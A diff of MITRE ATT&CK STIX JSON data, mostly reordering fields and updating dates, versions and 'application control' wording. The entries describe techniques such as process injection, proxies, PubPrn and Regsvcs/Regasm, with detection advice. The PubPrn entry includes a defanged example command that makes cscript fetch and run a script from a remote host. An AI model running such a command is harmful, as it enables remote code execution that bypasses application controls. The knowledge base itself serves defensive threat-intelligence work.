+ "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Endgame Process Injection July 2017) \n\nMonitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. \n\nMonitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits) \n\nMonitor for named pipe creation and connection events (Event IDs 17 and 18) for possible indicators of infected processes with external modules.(Citation: Microsoft Sysmon v6 May 2017) \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
+ "x_mitre_defense_bypassed": [
+ "Application control",
+ "Anti-virus"
],
"x_mitre_data_sources": [
"API monitoring",
@@ -20452,16 +21167,13 @@
"Process monitoring",
"Named Pipes"
],
- "x_mitre_defense_bypassed": [
- "Process whitelisting",
- "Anti-virus"
+ "x_mitre_contributors": [
+ "Anastasios Pingios",
+ "Christiaan Beek, @ChristiaanBeek",
+ "Ryan Becwar"
],
- "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Endgame Process Injection July 2017) \n\nMonitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. \n\nMonitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits) \n\nMonitor for named pipe creation and connection events (Event IDs 17 and 18) for possible indicators of infected processes with external modules.(Citation: Microsoft Sysmon v6 May 2017) \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ]
+ "x_mitre_version": "1.1",
+ "x_mitre_is_subtechnique": false
},
{
"external_references": [
@@ -20492,20 +21204,20 @@
],
"modified": "2020-03-15T00:40:27.503Z",
"created": "2020-03-15T00:40:27.503Z",
- "x_mitre_platforms": [
- "Linux",
- "Windows",
- "macOS"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
"x_mitre_data_sources": [
"Packet capture",
"Process use of network",
"Process monitoring",
"Network protocol analysis"
],
- "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows",
+ "macOS"
+ ]
},
{
"external_references": [
@@ -20546,11 +21258,9 @@
],
"modified": "2020-03-27T17:15:35.372Z",
"created": "2020-03-15T16:03:39.082Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_detection": "Monitoring for systems listening and/or establishing external connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client. \n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)",
"x_mitre_data_sources": [
"Network protocol analysis",
"Process monitoring",
@@ -20558,14 +21268,17 @@
"Netflow/Enclave netflow",
"Packet capture"
],
- "x_mitre_detection": "Monitoring for systems listening and/or establishing external connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client. \n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)",
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
+ "id": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Proxy",
+ "description": "Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.\n\nAdversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.",
"external_references": [
{
"source_name": "mitre-attack",
@@ -20583,10 +21296,9 @@
"source_name": "University of Birmingham C2"
}
],
- "description": "Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.\n\nAdversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.",
- "name": "Proxy",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -20594,7 +21306,7 @@
"phase_name": "command-and-control"
}
],
- "modified": "2020-03-27T17:50:37.638Z",
+ "modified": "2020-06-20T20:53:20.670Z",
"created": "2017-05-31T21:31:08.479Z",
"x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
@@ -20649,7 +21361,7 @@
"source_name": "GNU Acct"
},
{
- "url": "https://access.redhat.com/documentation/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing",
+ "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing",
"description": "Jahoda, M. et al.. (2017, March 14). redhat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017.",
"source_name": "RHEL auditd"
},
@@ -20677,22 +21389,21 @@
"phase_name": "privilege-escalation"
}
],
- "modified": "2020-03-26T20:27:52.470Z",
+ "modified": "2020-06-20T22:24:56.734Z",
"created": "2020-01-14T01:33:19.065Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS"
+ "x_mitre_defense_bypassed": [
+ "Anti-virus",
+ "Application control"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits) \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
"x_mitre_data_sources": [
"System calls",
"Process monitoring"
],
- "x_mitre_defense_bypassed": [
- "Anti-virus",
- "Process whitelisting"
+ "x_mitre_detection": "Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits) \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Linux"
]
},
{
@@ -20713,7 +21424,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "PubPrn",
- "description": "Adversaries may use the trusted PubPrn script to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application whitelisting solutions that do not account for use of these scripts.\n\nPubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and can be used to proxy execution from a remote site.(Citation: Enigma0x3 PubPrn Bypass) An example command is cscript C[:]\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png.",
+ "description": "Adversaries may use the trusted PubPrn script to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application control solutions that do not account for use of these scripts.\n\nPubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and can be used to proxy execution from a remote site.(Citation: Enigma0x3 PubPrn Bypass) An example command is cscript C[:]\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png.",
"id": "attack-pattern--09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -20722,21 +21433,21 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T19:39:37.206Z",
+ "modified": "2020-06-08T23:36:30.648Z",
"created": "2020-02-03T16:49:57.788Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
],
+ "x_mitre_detection": "Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring"
],
- "x_mitre_detection": "Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
@@ -20760,30 +21471,30 @@
"phase_name": "execution"
}
],
- "modified": "2020-03-28T17:44:07.769Z",
+ "modified": "2020-06-23T19:03:15.180Z",
"created": "2020-03-09T14:38:24.334Z",
- "x_mitre_platforms": [
- "Linux",
- "Windows",
- "macOS"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_system_requirements": [
+ "Python is installed."
],
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM",
+ "root"
+ ],
+ "x_mitre_detection": "Monitor systems for abnormal Python usage and python.exe behavior, which could be an indicator of malicious activity. Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.",
"x_mitre_data_sources": [
"System calls",
"Process monitoring",
"Process command-line parameters",
"API monitoring"
],
- "x_mitre_detection": "Monitor systems for abnormal Python usage and python.exe behavior, which could be an indicator of malicious activity. Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.",
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM",
- "root"
- ],
- "x_mitre_system_requirements": [
- "Python is installed."
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows",
+ "macOS"
+ ]
},
{
"id": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896",
@@ -20819,22 +21530,22 @@
],
"modified": "2020-03-26T18:08:20.049Z",
"created": "2017-05-31T21:30:25.584Z",
- "x_mitre_version": "1.2",
- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nInteraction with the Windows Registry may come from the command line using utilities such as [Reg](https://attack.mitre.org/software/S0075) or through running malware that may interact with the Registry through an API. Command-line invocation of utilities used to query the Registry may be detected through process and command-line monitoring. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
- "x_mitre_data_sources": [
- "Windows Registry",
- "Process monitoring",
- "Process command-line parameters"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows"
],
"x_mitre_permissions_required": [
"User",
"Administrator",
"SYSTEM"
],
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_data_sources": [
+ "Windows Registry",
+ "Process monitoring",
+ "Process command-line parameters"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nInteraction with the Windows Registry may come from the command line using utilities such as [Reg](https://attack.mitre.org/software/S0075) or through running malware that may interact with the Registry through an API. Command-line invocation of utilities used to query the Registry may be detected through process and command-line monitoring. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+ "x_mitre_version": "1.2"
},
{
"external_references": [
@@ -20880,19 +21591,19 @@
],
"modified": "2020-03-23T23:24:39.182Z",
"created": "2020-02-25T18:35:42.765Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_permissions_required": [
- "SYSTEM"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Consider monitoring processes for `tscon.exe` usage and monitor service creation that uses `cmd.exe /k` or `cmd.exe /c` in its arguments to detect RDP session hijacking.\n\nUse of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP.",
"x_mitre_data_sources": [
"Process monitoring",
"Netflow/Enclave netflow",
"Authentication logs"
+ ],
+ "x_mitre_detection": "Consider monitoring processes for `tscon.exe` usage and monitor service creation that uses `cmd.exe /k` or `cmd.exe /c` in its arguments to detect RDP session hijacking.\n\nUse of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "SYSTEM"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -20958,19 +21669,19 @@
],
"modified": "2020-03-24T23:46:20.433Z",
"created": "2020-01-15T16:25:22.260Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_permissions_required": [
- "root"
+ "x_mitre_platforms": [
+ "macOS"
],
- "x_mitre_detection": "The /etc/rc.common file can be monitored to detect changes from the company policy. Monitor process execution resulting from the rc.common script for unusual or unknown applications or behavior. ",
"x_mitre_data_sources": [
"Process monitoring",
"File monitoring"
],
- "x_mitre_platforms": [
- "macOS"
- ]
+ "x_mitre_detection": "The /etc/rc.common file can be monitored to detect changes from the company policy. Monitor process execution resulting from the rc.common script for unusual or unknown applications or behavior. ",
+ "x_mitre_permissions_required": [
+ "root"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
"id": "attack-pattern--6a3be63a-64c5-4678-a036-03ff8fc35300",
@@ -20993,6 +21704,26 @@
"created": "2017-12-14T16:46:06.044Z"
},
{
+ "created": "2020-01-24T18:15:06.641Z",
+ "modified": "2020-01-24T19:51:37.795Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "persistence"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "privilege-escalation"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--e5cc9e7a-e61a-46a1-b869-55fb6eab058e",
+ "description": "Adversaries may modify plist files to automatically run an application when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user logs into their machine after reboot. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at ~/Library/Preferences/com.apple.loginwindow.plist and ~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist. \n\nAn adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine (Citation: Methods of Mac Malware Persistence).",
+ "name": "Re-opened Applications",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -21005,26 +21736,6 @@
"source_name": "Methods of Mac Malware Persistence"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Re-opened Applications",
- "description": "Adversaries may modify plist files to automatically run an application when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user logs into their machine after reboot. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at ~/Library/Preferences/com.apple.loginwindow.plist and ~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist. \n\nAn adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine (Citation: Methods of Mac Malware Persistence).",
- "id": "attack-pattern--e5cc9e7a-e61a-46a1-b869-55fb6eab058e",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "persistence"
- },
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "privilege-escalation"
- }
- ],
- "modified": "2020-01-24T19:51:37.795Z",
- "created": "2020-01-24T18:15:06.641Z",
"x_mitre_platforms": [
"macOS"
],
@@ -21071,30 +21782,9 @@
],
"modified": "2020-03-30T13:47:29.922Z",
"created": "2017-05-31T21:31:18.867Z",
- "x_mitre_contributors": [
- "Praetorian"
- ],
- "x_mitre_permissions_required": [
- "User",
- "Administrator",
- "SYSTEM"
- ],
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows",
- "AWS",
- "GCP",
- "Azure",
- "Office 365",
- "SaaS",
- "Azure AD"
- ],
- "x_mitre_detection": "Existing methods of detecting remote access tools are helpful. Backup remote access tools or other access points may not have established command and control channels open during an intrusion, so the volume of data transferred may not be as high as the primary channel unless access is lost.\n\nDetection of tools based on beacon traffic, Command and Control protocol, or adversary infrastructure require prior threat intelligence on tools, IP addresses, and/or domains the adversary may use, along with the ability to detect use at the network boundary. Prior knowledge of indicators of compromise may also help detect adversary tools at the endpoint if tools are available to scan for those indicators.\n\nIf an intrusion is in progress and sufficient endpoint data or decoded command and control traffic is collected, then defenders will likely be able to detect additional tools dropped as the adversary is conducting the operation.\n\nFor alternative access using externally accessible VPNs or remote services, follow detection recommendations under [Valid Accounts](https://attack.mitre.org/techniques/T1078) and [External Remote Services](https://attack.mitre.org/techniques/T1133) to collect account use information.",
- "x_mitre_defense_bypassed": [
- "Network intrusion detection system",
- "Anti-virus"
- ],
+ "x_mitre_deprecated": true,
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "3.0",
"x_mitre_data_sources": [
"Office 365 account logs",
"Azure activity logs",
@@ -21108,9 +21798,30 @@
"Authentication logs",
"Binary file metadata"
],
- "x_mitre_version": "3.0",
- "x_mitre_is_subtechnique": false,
- "x_mitre_deprecated": true
+ "x_mitre_defense_bypassed": [
+ "Network intrusion detection system",
+ "Anti-virus"
+ ],
+ "x_mitre_detection": "Existing methods of detecting remote access tools are helpful. Backup remote access tools or other access points may not have established command and control channels open during an intrusion, so the volume of data transferred may not be as high as the primary channel unless access is lost.\n\nDetection of tools based on beacon traffic, Command and Control protocol, or adversary infrastructure require prior threat intelligence on tools, IP addresses, and/or domains the adversary may use, along with the ability to detect use at the network boundary. Prior knowledge of indicators of compromise may also help detect adversary tools at the endpoint if tools are available to scan for those indicators.\n\nIf an intrusion is in progress and sufficient endpoint data or decoded command and control traffic is collected, then defenders will likely be able to detect additional tools dropped as the adversary is conducting the operation.\n\nFor alternative access using externally accessible VPNs or remote services, follow detection recommendations under [Valid Accounts](https://attack.mitre.org/techniques/T1078) and [External Remote Services](https://attack.mitre.org/techniques/T1133) to collect account use information.",
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows",
+ "AWS",
+ "GCP",
+ "Azure",
+ "Office 365",
+ "SaaS",
+ "Azure AD"
+ ],
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator",
+ "SYSTEM"
+ ],
+ "x_mitre_contributors": [
+ "Praetorian"
+ ]
},
{
"external_references": [
@@ -21166,6 +21877,19 @@
],
"modified": "2020-03-23T12:55:30.119Z",
"created": "2020-03-02T20:08:03.691Z",
+ "x_mitre_data_sources": [
+ "Sensor health and status",
+ "Network protocol analysis",
+ "Netflow/Enclave netflow",
+ "Network intrusion detection system",
+ "Network device logs"
+ ],
+ "x_mitre_detection": "Detection of reflection amplification can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect a reflection amplification DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_impact_type": [
+ "Availability"
+ ],
"x_mitre_platforms": [
"macOS",
"Windows",
@@ -21176,19 +21900,6 @@
"GCP",
"Azure",
"SaaS"
- ],
- "x_mitre_impact_type": [
- "Availability"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Detection of reflection amplification can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect a reflection amplification DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.",
- "x_mitre_data_sources": [
- "Sensor health and status",
- "Network protocol analysis",
- "Netflow/Enclave netflow",
- "Network intrusion detection system",
- "Network device logs"
]
},
{
@@ -21284,23 +21995,23 @@
],
"modified": "2020-03-25T16:16:26.182Z",
"created": "2020-01-23T22:02:48.566Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_contributors": [
- "Oddvar Moe, @oddvarmoe"
- ],
- "x_mitre_data_sources": [
- "Windows Registry",
- "File monitoring"
- ],
- "x_mitre_detection": "Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.\n\nChanges to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"Administrator",
"User"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_detection": "Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.\n\nChanges to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
+ "x_mitre_data_sources": [
+ "Windows Registry",
+ "File monitoring"
+ ],
+ "x_mitre_contributors": [
+ "Oddvar Moe, @oddvarmoe"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "attack-pattern--215190a9-9f02-4e83-bb5f-e0589965a302",
@@ -21339,7 +22050,7 @@
},
{
"id": "attack-pattern--c48a67ee-b657-45c1-91bf-6cdbe27205f8",
- "description": "Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)\n\nBoth utilities may be used to bypass process whitelisting through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)",
+ "description": "Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)\n\nBoth utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)",
"name": "Regsvcs/Regasm",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -21379,29 +22090,29 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T15:50:56.613Z",
+ "modified": "2020-06-20T22:36:37.411Z",
"created": "2020-01-23T19:42:16.439Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_permissions_required": [
- "User",
- "Administrator"
- ],
- "x_mitre_defense_bypassed": [
- "Digital Certificate Validation",
- "Process whitelisting"
- ],
- "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of Regsvcs.exe and Regasm.exe. Compare recent invocations of Regsvcs.exe and Regasm.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after Regsvcs.exe or Regasm.exe invocation may also be useful in determining the origin and purpose of the binary being executed.",
- "x_mitre_data_sources": [
- "Process command-line parameters",
- "Process monitoring"
+ "x_mitre_platforms": [
+ "Windows"
],
"x_mitre_contributors": [
"Casey Smith"
